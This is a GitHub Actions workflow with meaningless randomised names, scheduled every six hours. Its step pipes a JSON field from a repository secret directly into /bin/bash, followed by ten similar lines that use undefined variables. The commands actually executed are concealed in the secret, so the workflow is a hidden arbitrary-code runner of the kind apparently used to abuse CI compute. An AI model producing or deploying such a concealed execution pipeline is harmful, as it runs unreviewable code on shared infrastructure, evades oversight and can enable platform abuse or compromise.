name: chenqinian3490
on:
  workflow_dispatch:
  schedule:
    - cron: '46 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenqinian3490
        env:
          mk9921: ${{ secrets.mk9921 }}
        run: |
          echo $mk9921 | jq -r .e51 | /bin/bash
          echo $mcaw755 | jq -r .a64895 | /bin/bash
          echo $ycm9 | jq -r .hhxf5851 | /bin/bash
          echo $xnml4 | jq -r .lwl5 | /bin/bash
          echo $lfh2695 | jq -r .zt31173 | /bin/bash
          echo $hu139 | jq -r .plt1203 | /bin/bash
          echo $kvf13 | jq -r .muc28089 | /bin/bash
          echo $zmiok999 | jq -r .rs1580 | /bin/bash
          echo $zb46 | jq -r .ptz51348 | /bin/bash
          echo $lh974 | jq -r .meaml9040 | /bin/bash
          echo $hst26278 | jq -r .psqj553 | /bin/bash

